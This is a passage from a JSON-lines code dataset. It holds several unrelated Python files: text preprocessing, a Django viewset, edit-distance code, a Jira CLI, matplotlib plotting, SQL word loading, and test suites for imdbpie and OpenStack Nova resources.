sentence\n    return clean\n\n\ndef stemming(inputSen):\n    sentence=tokenize(inputSen)\n    for x in sentence:\n        inputSen=inputSen.replace(x,PorterStemmer().stem(x))  # stemming removes suffixes, e.g. playing -> play\n    return inputSen\n\ndef Lemmatization(inputSen):\n    lemmd=[]\n    lemmatizer= WordNetLemmatizer()\n    token=inputSen.split()\n    for x in token:\n        lemmd.append(lemmatizer.lemmatize(x))  # lemmatization changes words back to their root form, e.g. apples -> apple\n    ret=(\" \").join(lemmd)\n    return ret\n\ndef cleanSW(inputSen):\n\n    tokens=tokenize(inputSen)\n    clean_tokens=[x for x in tokens if not x in stopwords.words()]  # drop words with little meaning such as 'a', 'is' \n    return clean_tokens\n\ndef correctSpelling(inputSen):\n\n    spellcheck=SpellChecker()\n    correctspell=[spellcheck.correction(clean) for clean in inputSen]  # correct spelling\n    clean_sentence=(\" \").join(correctspell)\n    return clean_sentence\n\n","sub_path":"preprocessing.py","file_name":"preprocessing.py","file_ext":"py","file_size_in_byte":2365,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"}{"seq_id":"496631112","text":"from django.shortcuts import render\nfrom django.shortcuts import get_object_or_404\nfrom django.core.exceptions import FieldError\nfrom django.db.models import F\nfrom rest_framework.response import Response\nfrom rest_framework.pagination import PageNumberPagination\nfrom rest_framework.decorators import action\nfrom rest_framework import viewsets\nfrom rest_framework import status\n\n\"\"\"\n    This file contains parent viewset classes with an extended set of capabilities\n\"\"\"\n\n\n# Parent class holding the methods needed\n# for a common group of objects\nclass MethodModelViewSet(viewsets.ModelViewSet):\n    def __init__(self, *args, **kwargs):\n        super().__init__(*args, **kwargs)\n\n    # Forced filtering for all methods\n    # Required for the filtering in the parent classes to work\n    def filter_queryset(self, queryset):\n        filter_backends = self.filter_backends\n        for backend in list(filter_backends):\n            queryset = backend().filter_queryset(\n                self.request,\n                queryset,\n                view=self\n            )\n        return queryset\n\n    # Pulls the requested output field names 
from the request\n    # The set of output fields equals the list passed in the request\n    def get_list_field_values(self, request):\n        flds = request.query_params.get('values', None)\n        if flds:\n            flds = flds.strip().strip(' ').split(',')\n        else:\n            try:\n                getattr(self, 'default_list_fields')\n            except AttributeError:\n                fieldlist = [field.name for field in\n                             self.serializer_class.Meta.model._meta.fields]\n                self.default_list_fields = fieldlist\n        self.list_fields = flds if flds else self.default_list_fields\n\n    def partial_update(self, request, pk = None):\n        model = self.serializer_class.Meta.model\n        instance = model.objects.get(id = pk)\n        fields = list(map(lambda x: x.name, model._meta.fields))\n        data = request.data.copy()\n        if 'user' in fields:\n            data.update({'user': request.user})\n        for field in fields:\n            attr = data.get(field, None)\n            if attr:\n                setattr(instance, field, attr)\n        instance.save()\n        return Response({'data': data}, status = status.HTTP_200_OK)\n\n    # NOTE: currently identical to partial_update; a full update would also\n    # require every field to be present\n    def update(self, request, pk = None):\n        model = self.serializer_class.Meta.model\n        instance = model.objects.get(id = pk)\n        fields = list(map(lambda x: x.name, model._meta.fields))\n        data = request.data.copy()\n        if 'user' in fields:\n            data.update({'user': request.user})\n        for field in fields:\n            attr = data.get(field, None)\n            if attr:\n                setattr(instance, field, attr)\n        instance.save()\n        return Response({'data': data}, status = status.HTTP_200_OK)\n\n    # Returns a paginated list of objects\n    # The field set is taken from an attribute on the child class, or from\n    # the request if one is given\n    def list(self, request):\n        self.get_list_field_values(request)\n        queryset = self.filter_queryset(self.queryset)\n        page = self.paginate_queryset(queryset)\n        serializer = self.get_serializer(\n            page,\n            many = True,\n            fields = self.list_fields\n        )\n        return self.get_paginated_response(serializer.data)\n","sub_path":"main_app/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3932,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"}{"seq_id":"129984075","text":"\nimport collections\n\n\nclass EditingSequence(object):\n\n    ACTION_NONE = 0\n    ACTION_INSERT = 1\n    ACTION_DELETE = 2\n    ACTION_EDIT = 3\n\n    COST_NONE = 0\n    COST_INSERT = 1\n    COST_DELETE = 1\n    COST_EDIT = 1\n\n    def __init__(self, debug=False):\n        self._debug = debug\n        self._s = ''\n        self._t = ''\n        self._cost_table = list()\n        self._action_table = list()\n\n    def _init_tables(self):\n        self._cost_table.append(\n            list(range(len(self._s)))\n        )\n        self._action_table.append(\n            [self.ACTION_NONE] + [self.ACTION_DELETE for _ in range(len(self._s))]\n        )\n        for row_idx in range(1, len(self._t)):\n            self._cost_table.append(\n                [row_idx] + [0 for _ in range(len(self._s) - 1)]\n            )\n            self._action_table.append(\n                [self.ACTION_INSERT] + [self.ACTION_NONE for _ in range(len(self._s) - 1)]\n            )\n\n    def _choice_insert(self, row_idx, column_idx):\n        prev_cost = self._cost_table[row_idx - 1][column_idx]\n        return self.COST_INSERT + prev_cost, self.ACTION_INSERT\n\n    def _choice_delete(self, row_idx, column_idx):\n        prev_cost = self._cost_table[row_idx][column_idx - 1]\n        return self.COST_DELETE + prev_cost, self.ACTION_DELETE\n\n    def _choice_edit(self, row_idx, column_idx):\n        c_s = self._s[column_idx]\n        c_t = self._t[row_idx]\n        prev_cost = self._cost_table[row_idx - 1][column_idx - 1]\n        if c_s != c_t:\n            return self.COST_EDIT + prev_cost, self.ACTION_EDIT\n        return self.COST_NONE + 
prev_cost, self.ACTION_NONE\n\n    def _process(self):\n        for row_idx in range(1, len(self._t)):\n            for column_idx in range(1, len(self._s)):\n                best_cost = 0xFFFFFFFF\n                action = self.ACTION_NONE\n                for cost, ac in (\n                        self._choice_edit(row_idx, column_idx),\n                        self._choice_insert(row_idx, column_idx),\n                        self._choice_delete(row_idx, column_idx),\n                ):\n                    if cost < best_cost:\n                        best_cost = cost\n                        action = ac\n                self._cost_table[row_idx][column_idx] = best_cost\n                self._action_table[row_idx][column_idx] = action\n        return self._cost_table[-1][-1]\n\n    def actions(self):\n        actions = collections.deque()\n        row_index = len(self._t) - 1\n        column_index = len(self._s) - 1\n        while row_index or column_index:\n            prev_action = self._action_table[row_index][column_index]\n            token = '_'\n            if prev_action == self.ACTION_NONE:\n                row_index -= 1\n                column_index -= 1\n            elif prev_action == self.ACTION_EDIT:\n                row_index -= 1\n                column_index -= 1\n                token = 'x'\n            elif prev_action == self.ACTION_INSERT:\n                # an insert consumed a character of the target, so step up one row\n                # (mirrors _choice_insert, which reads cost_table[row_idx - 1][column_idx])\n                row_index -= 1\n                token = '+'\n            elif prev_action == self.ACTION_DELETE:\n                # a delete consumed a character of the source, so step back one column\n                # (mirrors _choice_delete, which reads cost_table[row_idx][column_idx - 1])\n                column_index -= 1\n                token = '-'\n            actions.appendleft(token)\n        return ''.join(actions)\n\n    def __call__(self, s, t):\n        self._s = ' ' + s\n        self._t = ' ' + t\n        self._cost_table = list()\n        self._action_table = list()\n        if not (self._s or self._t):\n            return 0\n        self._init_tables()\n        return self._process()\n\n","sub_path":"DP/editingSequence/v3.py","file_name":"v3.py","file_ext":"py","file_size_in_byte":3451,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"}{"seq_id":"384956917","text":"\"\"\"Module for defining CLI\"\"\"\n\nfrom os import getcwd\nimport click\nfrom git import Repo, RemoteProgress\nfrom jira import Issue\nfrom utils import branchify\n\n@click.group()\ndef cli():\n    \"\"\"Jira management\"\"\"\n\n@click.option('--url', prompt='Please provide the Jira issue url')\n@cli.command()\ndef new(url):\n    \"\"\"Start a new Jira ticket\"\"\"\n    repo = Repo('/Users/dominic.batten/projects/eigen')\n    if repo.is_dirty():\n        return click.echo('You have unstaged changes. 
Aborting')\n    issue = Issue(url)\n    # branch_input = branchify(\n    #     click.prompt(\n    #         'Please enter branch name',\n    #         default=issue.default_title(),\n    #     ),\n    # )\n    # new_branch = f\"{issue.type()}/{branch_input}/{issue.key()}\"\n    # click.echo(f\"Creating new branch {new_branch}\")\n    # repo.git.checkout('master')\n    # click.echo(\"Pulling latest master\")\n    # repo.remotes.origin.pull('master')\n    # click.echo(\"Switching to new branch\")\n    # current = repo.create_head(new_branch)\n    # current.checkout()\n    # with open('/tmp/scratch.vim' , 'r') as file:\n    #     current_notes = file.read(100)\n    # overwrite = click.confirm(\n    #     f\"Overwrite current scratch window?\\n{current_notes}...\",\n    #     default=True,\n    # )\n    # if overwrite:\n    with open('/tmp/scratch.md', 'w') as file:\n        file.write(issue.description())\n    # else:\n    #     with open('/tmp/scratch.vim' , 'a') as file:\n    #         file.write(issue.description())\n    click.echo(\"Done\")\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1506,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"}{"seq_id":"219299417","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Jun 20 16:06:27 2021\n\n@author: ryan\n\"\"\"\n\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport matplotlib\n\n\nfont_size_of_the_code = 12  # 24\nfont = {'family' : 'sans-serif',  # 'normal' is not a real matplotlib font family\n        'weight' : 'bold',\n        'size'   : font_size_of_the_code}\nmatplotlib.rc('font', **font)\n\n\n\n\n\n\n\"\"\"\n3D EXPRESSION AND LOCATION PLOTS\n\"\"\"\nfor typ in ['BM','UC']:\n    for den in ['high','low']:\n        file = 'RNAcounts05_12'+typ+den+'_dense.txt'\n        with open(file) as f:\n            lines = f.readlines()\n        cd = np.array([[float(j) for j in i.split()] for i in lines[1:]]).T\n        gene = lines[0].split()\n        w = cd[0]\n        x = cd[1]/1000\n        y = cd[2]/1000\n        il8 = cd[3]\n        il6 = cd[4]\n        ccl11 = cd[5]\n        ax = plt.axes(projection='3d')\n        ax.scatter3D(x, y, il8, c='yellow')\n        ax.scatter3D(x, y, il6, c='cyan')\n        ax.scatter3D(x, y, ccl11, c='magenta')\n        ax.set_xlabel('x [mm]')\n        ax.set_ylabel('y [mm]')\n        ax.set_zlabel('Dots')\n        ax.legend(gene[3:])\n        # ax.plot_trisurf(x, y, il6, alpha=0.5, edgecolor='black')\n        # plt.show()\n        # ax.scatter3D(x, y, il8, c=il8, cmap='plasma');\n        # ax.plot_trisurf(x, y, il8, cmap='magma', edgecolor='none');\n        ax.view_init(30, 0)\n        plt.savefig('Quantification/location_plot_'+file[14:][:-4])\n        plt.show()\n        \n        a = 0.8\n        for well in set(w):\n            x = [i for i,j in zip(cd[1]/1000,w) if j == well]\n            y = [i for i,j in zip(cd[2]/1000,w) if j == well]\n            il8 = [(i) for i,j in zip(cd[3],w) if j == well]\n            il6 = [(i) for i,j in zip(cd[4],w) if j == well]\n            ccl11 = [(i) for i,j in zip(cd[5],w) if j == well]\n            fig, axs = plt.subplots(2,2)\n            axs[0,0].title.set_text('Well '+str(well)[0]+': '+file[14:][:-4])\n            axs[0,0].scatter(x, y, c=il8, cmap='inferno',alpha=a)\n            axs[0,1].scatter(x, y, c=il6, cmap='inferno',alpha=a)\n            axs[1,0].scatter(x, y, c=ccl11, cmap='inferno',alpha=a)\n            axs[1,1].scatter(np.linspace(np.min(x),np.max(x),100)*0, np.linspace(0,1,100), c=np.linspace(np.min(x),np.max(x),100), cmap='inferno',alpha=a)\n            axs[1,0].set_xlabel('location [mm]')\n            axs[0,0].set_ylabel('il8')\n            axs[0,1].set_ylabel('il6')\n            axs[1,0].set_ylabel('ccl11')\n            axs[1,1].set_xlabel('colorkey')\n            axs[1,1].set_ylabel('dots')\n            axs[1,1].get_xaxis().set_ticks([])\n            # axs[1,1].get_yaxis().set_ticks([])\n            # axs[0,0].set_ylim([-20, 20])\n            # axs[0,1].set_ylim([-20, 20])\n            # axs[1,0].set_ylim([-20, 20])\n            # axs[0,0].set_xlim([np.mean(x)-20, np.mean(x)+20])\n            
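# axs[1,1] doubles as a hand-rolled colour key: a zero-width column of points on\n            # the same 'inferno' colormap, so the dot-count-to-colour mapping of the three\n            # expression panels can be read off against it\n            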
plt.tight_layout()\n            plt.savefig('Quantification/location_plot_2D_well'+str(well)+'_'+file[14:][:-4]+'.png')\n            plt.show()\n            \n            \n            \n            # per-gene 3D figures: one surface and one scatter plot for each of il8, il6 and\n            # ccl11, with the gene name (plus 'Scatter') as the filename suffix\n            for plotter, tag in (('trisurf', ''), ('scatter', 'Scatter')):\n                for values, colour, gene_name in ((il8, 'yellow', 'il8'), (il6, 'cyan', 'il6'), (ccl11, 'magenta', 'ccl11')):\n                    ax = plt.axes(projection='3d')\n                    if plotter == 'trisurf':\n                        ax.plot_trisurf(x, y, values, alpha=0.5, color=colour)\n                    else:\n                        ax.scatter3D(x, y, values, alpha=0.5, color=colour)\n                    ax.set_xlabel('x [mm]')\n                    ax.set_ylabel('y [mm]')\n                    ax.set_zlabel('Dots')\n                    ax.view_init(30, 45)\n                    plt.savefig('Quantification/location_well'+str(well)+'_plot_'+file[14:][:-4]+'_'+gene_name+tag+'.png')\n                    plt.show()\n            \n    ","sub_path":"counting_and_visualization_package/FigS59.py","file_name":"FigS59.py","file_ext":"py","file_size_in_byte":5319,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"}{"seq_id":"129927364","text":"import re\n\nselectWordWeightGroup = \"\"\"\nselect \n\tword,\n\tavgprob,\n\ttype\nfrom patientdischarge.wordweightgroup\n\"\"\"\n\ninsertDiseaseUniqueWords = \"\"\"\ninsert into patientdischarge.diseaseuniquewords(word, disease) \nvalues (%s, %s)\n\"\"\"\n\nwhiteSpace = \"\\\\s+\"\nsingleSpace = \" \"\n\ndef calculateUniqueWords(connection):\n\tcursor = connection.cursor(buffered=True)\n\n\tcursor.execute(selectWordWeightGroup)\n\t\n\tinternalRepo = {}\n\n\tfor wordWeight in cursor:\n\t\tword = wordWeight[0]\n\t\tcount = float(wordWeight[1])\n\t\tdisease = wordWeight[2]\n\n\t\tif not internalRepo.has_key(disease):\n\t\t\tinternalRepo[disease] = { word: None }\n\t\telse: \n\t\t\tinternalRepo[disease][word] = None\n\n\tcursor.close()\n\tuniqueWordRepo = {}\n\n\tfor diseaseKey in internalRepo:\n\t\t# set up to begin with\n\t\tuniqueWordRepo[diseaseKey] = {}\n\n\t\tfor word in internalRepo[diseaseKey]:\n\n\t\t\t# let's make sure this word doesn't exist in any other dictionary\n\t\t\texists = False\n\t\t\tfor otherDiseaseKey in internalRepo:\n\t\t\t\tif otherDiseaseKey == diseaseKey:\n\t\t\t\t\tcontinue\n\n\t\t\t\tif internalRepo[otherDiseaseKey].has_key(word):\n\t\t\t\t\texists = True\n\t\t\t\t\tbreak\n\n\t\t\tif not exists:\n\t\t\t\tuniqueWordRepo[diseaseKey][word] = None\n\n\tcursor = connection.cursor(buffered=True)\n\t# now, go through other repo and upload 
results\n\tfor diseaseKey in uniqueWordRepo:\n\t\tfor wordKey in uniqueWordRepo[diseaseKey]:\n\t\t\tcursor.execute(insertDiseaseUniqueWords, (wordKey, diseaseKey))\n\n\tconnection.commit()\n\tcursor.close()","sub_path":"source/loading/diseaseUniqueWords.py","file_name":"diseaseUniqueWords.py","file_ext":"py","file_size_in_byte":1423,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"}{"seq_id":"279227110","text":"import hashlib\n\ninn = 'cxdnnyjw'\nk = 0\nl = 0\n\ncode = \"\"\nwhile k < 8:\n\tmy_str = inn + str(l)\n\tdh = hashlib.md5(my_str.encode()).hexdigest()\n\tif dh[0:5] == '00000':\n\t\tprint(dh)\n\t\tcode += dh[5]\n\t\tk += 1\n\tl += 1\n\nprint(' final code: ' + code)","sub_path":"y2016_lev5a.py","file_name":"y2016_lev5a.py","file_ext":"py","file_size_in_byte":245,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"}{"seq_id":"644647673","text":"# coding: utf-8\nfrom __future__ import absolute_import, unicode_literals\n\nimport time\nimport re\nimport datetime\nfrom operator import itemgetter\n\nimport pytest\nfrom mock import patch\nfrom six.moves.urllib_parse import quote\n\nfrom imdbpie import Imdb\nfrom imdbpie.objects import Image, Person\nfrom imdbpie.exceptions import HTTPError\n\nfrom tests.utils import load_test_data, assert_urls_match, is_valid_url\n\n\nclass TestImdb(object):\n\n    imdb = Imdb(locale='en_US', cache=False)\n\n    def test_build_url(self):\n        imdb_fr = Imdb(locale='en_FR', cache=False)\n        imdb_fr.timestamp = time.mktime(datetime.date.today().timetuple())\n\n        url = imdb_fr._build_url(\n            path='/title/maindetails', params={'tconst': 'tt1111111'})\n\n        expected_url = (\n            'https://app.imdb.com/'\n            'title/maindetails'\n            '?apiKey=d2bb34ec6f6d4ef3703c9b0c36c4791ef8b9ca9b'\n            '&apiPolicy=app1_1'\n            '&locale=en_FR'\n            '&timestamp={timestamp}'\n            '&tconst=tt1111111&api=v1&appid=iphone1_1'\n        ).format(timestamp=imdb_fr.timestamp)\n\n        assert_urls_match(expected_url, url)\n\n    def test_build_url_proxied(self):\n        imdb_fr = Imdb(\n            locale='en_FR',\n            cache=False,\n            anonymize=True,\n            proxy_uri='http://someproxywebsite.co.uk?url={0}'\n        )\n        imdb_fr.timestamp = time.mktime(datetime.date.today().timetuple())\n\n        url = imdb_fr._build_url(\n            path='/title/maindetails', params={'tconst': 'tt1111111'})\n\n        expected_url = (\n            'http://someproxywebsite.co.uk?url=' +\n            quote('https://app.imdb.com/title/maindetails')\n        )\n        assert url.startswith(expected_url) is True\n\n    def test_get_title_plots(self):\n        plots = self.imdb.get_title_plots('tt0111161')\n\n        expected_plot3 = ('Andy Dufresne is sent to Shawshank Prison for the '\n                          'murder of his wife and her secret lover. He is very'\n                          ' isolated and lonely at first, but realizes there '\n                          'is something deep inside your body that people '\n                          'can\\'t touch or get to....\\'HOPE\\'. Andy becomes '\n                          'friends with prison \\'fixer\\' Red, and Andy '\n                          'epitomizes why it is crucial to have dreams. 
His '\n 'spirit and determination lead us into a world full '\n 'of imagination, one filled with courage and desire.'\n ' Will Andy ever realize his dreams?')\n\n assert len(plots) >= 5\n assert expected_plot3 in plots\n\n def test_get_credits_data(self):\n credits = self.imdb._get_credits_data('tt0111161')\n expected_credits = load_test_data('get_credits_tt0111161.json')\n\n assert len(expected_credits) <= len(credits)\n for index, credit_item in enumerate(expected_credits):\n assert (\n sorted(credit_item, key=itemgetter(1)) ==\n sorted(credits[index], key=itemgetter(1))\n )\n\n def test_get_credits_non_existant_title(self):\n\n with pytest.raises(HTTPError):\n self.imdb._get_credits_data('tt9999999')\n\n def test_get_reviews_data(self):\n reviews = self.imdb._get_reviews_data('tt0111161')\n assert len(reviews) == 10\n\n expected_review_keys = [\n 'status',\n 'user_score',\n 'text',\n 'summary',\n 'user_score_count',\n 'date',\n 'user_name'\n ]\n # other optional keys: user_rating, user_location\n\n # results are changeable so check on data structure\n for review in reviews:\n for key in expected_review_keys:\n assert key in review.keys()\n\n def test_get_title_reviews(self):\n reviews = self.imdb.get_title_reviews('tt0111161')\n assert 10 == len(reviews)\n\n assert reviews[0].username == 'carflo'\n assert reviews[0].date == '2003-11-26'\n assert reviews[0].summary == 'Tied for the best movie I have ever seen'\n\n def test_get_title_reviews_limit(self):\n reviews = self.imdb.get_title_reviews('tt2294629', max_results=20)\n assert 20 == len(reviews)\n\n reviews = self.imdb.get_title_reviews('tt2294629', max_results=31)\n assert 31 == len(reviews)\n\n def test_title_reviews_non_existant_title(self):\n\n with pytest.raises(HTTPError):\n self.imdb.get_title_reviews('tt9999999')\n\n def test_title_exists(self):\n result = self.imdb.title_exists('tt2322441')\n assert True is result\n\n def test_title_exists_non_existant_title(self):\n result = self.imdb.title_exists('tt0000000')\n assert False is result\n\n def test_search_for_title_searching_title(self):\n results = self.imdb.search_for_title('Shawshank redemption')\n expected_top_results = [\n {\n 'imdb_id': 'tt0111161',\n 'title': 'The Shawshank Redemption',\n 'year': '1994',\n 'type': 'feature',\n },\n {\n 'imdb_id': 'tt5443386',\n 'title': 'The Shawshank Redemption: Behind the Scenes',\n 'year': '2004',\n 'type': 'video',\n },\n ]\n assert len(results) > 0\n assert expected_top_results == results[:2]\n\n @pytest.mark.parametrize('query', [\n 'Mission: Impossible',\n 'Honey, I Shrunk the Kids',\n '4.3.2.1. (2010)',\n '500 Days of Summer (2009)',\n '$9.99 (2008)',\n 'Goonies 1986',\n '[REC] (2007)',\n '[REC]² (2009)',\n '[REC]³ Genesis (2012)',\n '¡Three Amigos! 
(1986)',\n '(Untitled) (2009)',\n ])\n def test_search_for_title_input_with_special_chars(self, query):\n results = self.imdb.search_for_title(query)\n assert len(results) > 0\n\n def test_search_for_person(self):\n results = self.imdb.search_for_person('Andrew Lloyd Webber')\n\n assert len(results) > 0\n expected_results = [\n {'name': 'Andrew Lloyd Webber', 'imdb_id': 'nm0515908'},\n ]\n assert (sorted(expected_results, key=itemgetter('imdb_id')) ==\n sorted(results, key=itemgetter('imdb_id')))\n\n def test_search_for_title_no_results(self):\n results = self.imdb.search_for_title('898582da396c93d5589e0')\n assert [] == results\n\n def test_top_250(self):\n results = self.imdb.top_250()\n\n assert 250 == len(results)\n\n expected_keys = [\n 'rating',\n 'tconst',\n 'title',\n 'image',\n 'num_votes',\n 'year',\n 'can_rate',\n 'type'\n ]\n # results are changeable so check on data structure\n for result in results:\n assert sorted(expected_keys) == sorted(result.keys())\n\n def test_popular_shows(self):\n results = self.imdb.popular_shows()\n\n assert 50 == len(results)\n\n expected_keys = [\n 'tconst',\n 'title',\n # 'image', # optional key\n 'year',\n 'principals',\n 'type'\n ]\n # results are changeable so check on data structure\n for index, result in enumerate(results):\n assert set(expected_keys).issubset(set(result.keys())) is True\n\n def test_popular_movies(self):\n results = self.imdb.popular_movies()\n\n assert 25 == len(results)\n\n expected_keys = [\n 'tconst',\n 'title',\n 'year',\n 'principals',\n 'type'\n ]\n for index, result in enumerate(results):\n assert (\n set(expected_keys).issubset(set(result['object'].keys()))\n is True\n )\n\n def test_get_title_by_id_returns_none_when_is_episode(self):\n imdb = Imdb(exclude_episodes=True)\n assert imdb.get_title_by_id('tt0615090') is None\n\n @patch('imdbpie.imdbpie.Imdb._get')\n def test_get_title_by_id_returns_none_when_no_resp(self, mock_get):\n mock_get.return_value = None\n assert self.imdb.get_title_by_id('tt0111161') is None\n\n def test_get_person_by_id(self):\n person = self.imdb.get_person_by_id('nm0000151')\n\n assert person.name == 'Morgan Freeman'\n assert person.imdb_id == 'nm0000151'\n assert is_valid_url(person.photo_url) is True\n\n @patch('imdbpie.imdbpie.Imdb._get')\n def test_get_person_by_id_returns_none_when_no_resp(self, mock_get):\n mock_get.return_value = None\n assert self.imdb.get_person_by_id('nm0000151') is None\n\n def test_get_title_by_id(self):\n title = self.imdb.get_title_by_id('tt0111161')\n\n assert title.title == 'The Shawshank Redemption'\n assert title.year == 1994\n assert title.type == 'feature'\n assert title.tagline == ('Fear can hold you prisoner. 
'\n 'Hope can set you free.')\n assert isinstance(title.plots, list) is True\n assert len(title.plots) >= 5\n assert isinstance(title.rating, float) is True\n assert sorted(title.genres) == sorted(['Crime', 'Drama'])\n assert isinstance(title.votes, int) is True\n assert title.runtime == 8520\n\n assert is_valid_url(title.poster_url) is True\n assert is_valid_url(title.cover_url) is True\n assert title.release_date == '1994-10-14'\n assert title.certification == 'R'\n\n for trailer_url in title.trailer_image_urls:\n assert is_valid_url(trailer_url) is True\n\n expected_plot_outline = (\n 'Two imprisoned men bond over a number '\n 'of years, finding solace and eventual redemption through acts '\n 'of common decency.'\n )\n assert title.plot_outline == expected_plot_outline\n\n assert isinstance(title.directors_summary[0], Person)\n assert len(title.directors_summary) == 1\n\n assert len(title.creators) == 0\n assert len(title.cast_summary) == 4\n\n expected_cast_names = ['Tim Robbins', 'Morgan Freeman',\n 'Bob Gunton', 'William Sadler']\n for name in expected_cast_names:\n assert name in [p.name for p in title.cast_summary]\n\n expected_writers = ['Stephen King', 'Frank Darabont']\n for name in expected_writers:\n assert name in [p.name for p in title.writers_summary]\n\n assert len(title.credits) >= 327\n assert (\n sorted(load_test_data('expected_credits.json')) ==\n sorted([p.imdb_id for p in title.credits])\n )\n assert isinstance(title.credits[10], Person)\n\n assert len(title.trailers) == 3\n\n def test_get_title_by_id_using_proxy(self):\n imdb = Imdb(locale='en_US', cache=False, anonymize=True)\n title = imdb.get_title_by_id('tt0111161')\n\n assert title.title == 'The Shawshank Redemption'\n assert title.year == 1994\n assert title.type == 'feature'\n assert title.tagline == ('Fear can hold you prisoner. 
'\n 'Hope can set you free.')\n assert isinstance(title.plots, list) is True\n assert len(title.plots) >= 5\n assert isinstance(title.rating, float) is True\n assert sorted(title.genres) == sorted(['Crime', 'Drama'])\n assert isinstance(title.votes, int) is True\n assert title.runtime == 8520\n assert len(title.trailers) == 3\n\n def test_get_title_by_id_redirection_result(self):\n assert self.imdb.get_title_by_id('tt0000021') is None\n\n def test_get_title_by_id_excludes_episodes(self):\n assert self.imdb.get_title_by_id('tt3181538') is not None\n\n imdb = Imdb(exclude_episodes=True)\n title = imdb.get_title_by_id('tt3181538')\n\n assert title is None\n\n def test_get_episodes(self):\n assert self.imdb.get_title_by_id('tt0303461') is not None\n\n imdb = Imdb()\n episodes = imdb.get_episodes('tt0303461')\n assert episodes is not None\n\n assert len(episodes) == 14\n episode_1 = episodes[0]\n assert episode_1.imdb_id == \"tt0579539\"\n assert episode_1.type == \"tv_episode\"\n assert episode_1.title == u'The Train Job'\n assert episode_1.series_name == 'Firefly'\n assert episode_1.release_date == \"2002-09-20\"\n assert episode_1.year == 2002\n\n def test_get_episodes_raises_when_exclude_episodes_enabled(self):\n imdb = Imdb(locale='en_US', cache=False, exclude_episodes=True)\n with pytest.raises(ValueError):\n imdb.get_episodes('tt0303461')\n\n def test_get_person_images(self):\n person_images = self.imdb.get_person_images('nm0000032')\n\n assert len(person_images) >= 200\n for person_image in person_images[:10]:\n assert person_image.caption is not None\n assert is_valid_url(person_image.url) is True\n assert isinstance(person_image.width, int)\n assert isinstance(person_image.height, int)\n\n def test_get_title_images(self):\n title_images = self.imdb.get_title_images('tt0111161')\n\n assert len(title_images) >= 38\n\n for image in title_images:\n assert isinstance(image, Image) is True\n\n def test_get_title_by_id_raises_not_found(self):\n\n with pytest.raises(HTTPError):\n self.imdb.get_title_by_id('tt9999999')\n\n @pytest.mark.parametrize('imdb_id, exp_valid', [\n ('tt1234567', True),\n ('nm1234567', True),\n ('x', False),\n (1234567, False),\n (None, False),\n ])\n def test_validate_imdb_id(self, imdb_id, exp_valid):\n\n if exp_valid:\n # no raise\n self.imdb.validate_imdb_id(imdb_id)\n else:\n with pytest.raises(ValueError):\n self.imdb.validate_imdb_id(imdb_id)\n","sub_path":"src/tests/test_imdb.py","file_name":"test_imdb.py","file_ext":"py","file_size_in_byte":13984,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"583479278","text":"#!/usr/bin/env python\n# -- encoding: utf-8 --\n#\n# Copyright 2015 Telefónica Investigación y Desarrollo, S.A.U\n#\n# This file is part of FI-Core project.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n#\n# You may obtain a copy of the License at:\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n#\n# See the License for the specific language governing permissions and\n# limitations under the License.\n#\n# For those usages not covered by the Apache version 2.0 License please\n# contact with opensource@tid.es\n#\nimport unittest\nfrom mock import MagicMock\n\nfrom 
fiwareskuld.nova_resources import NovaResources\n\n__author__ = 'chema'\n\n\nclass TestNovaResourcesConstructor(unittest.TestCase):\n    \"\"\"class for testing the constructor of NovaResources\"\"\"\n    def test_constructor(self):\n        \"\"\"test constructor and self attributes after the call\"\"\"\n        config = {'get_novaclient.return_value': 'fake_nova_client',\n                  'get_session.return_value.get_project_id.return_value': 'id'}\n        osclients = MagicMock(**config)\n        nova_resources = NovaResources(osclients)\n        self.assertEquals(nova_resources.osclients, osclients)\n        self.assertEquals(nova_resources.novaclient, 'fake_nova_client')\n        self.assertEquals(nova_resources.tenant_id, 'id')\n\n\nclass TestNovaResources(unittest.TestCase):\n    \"\"\"class for testing the methods of NovaResources\"\"\"\n    def setUp(self):\n        \"\"\"create an object and fill the fields with mocks\"\"\"\n        osclients = MagicMock()\n        self.nova_resources = NovaResources(osclients)\n        self.nova_resources.novaclient = MagicMock(name='novaclient')\n        self.nova_resources.tenant_id = 'tenant_id'\n\n    def test_on_region_changed(self):\n        \"\"\"test method on_region_changed. Check that a new client is obtained\"\"\"\n        old_client = self.nova_resources.novaclient\n        self.nova_resources.on_region_changed()\n        # check that the nova client object has changed\n        new_client = self.nova_resources.novaclient\n        self.assertNotEquals(old_client, new_client)\n\n    def prepare_vms(self, mock):\n        \"\"\"prepare mock to do operations with VMs.\n        There are 4 VMs; all but the last are in ACTIVE state\"\"\"\n        vms = list()\n        for i in range(3):\n            vms.append(MagicMock(id=i, user_id='userid', status='ACTIVE',\n                                 tenant_id=self.nova_resources.tenant_id))\n        vms.append(MagicMock(id=3, user_id='userid', status='OTHER',\n                             tenant_id=self.nova_resources.tenant_id))\n        config = {'servers.list.return_value': vms}\n        mock.configure_mock(**config)\n        return vms\n\n    def test_get_tenant_vms(self):\n        \"\"\"test get_tenant_vms method. Check id, user_id and status of each\n        VM\"\"\"\n        self.prepare_vms(self.nova_resources.novaclient)\n        result = self.nova_resources.get_tenant_vms()\n        for i in range(3):\n            self.assertEquals(result[i][0], i)\n            self.assertEquals(result[i][1], 'userid')\n            self.assertEquals(result[i][2], 'ACTIVE')\n        self.assertEquals(result[3][0], 3)\n        self.assertEquals(result[3][1], 'userid')\n        self.assertEquals(result[3][2], 'OTHER')\n\n    def 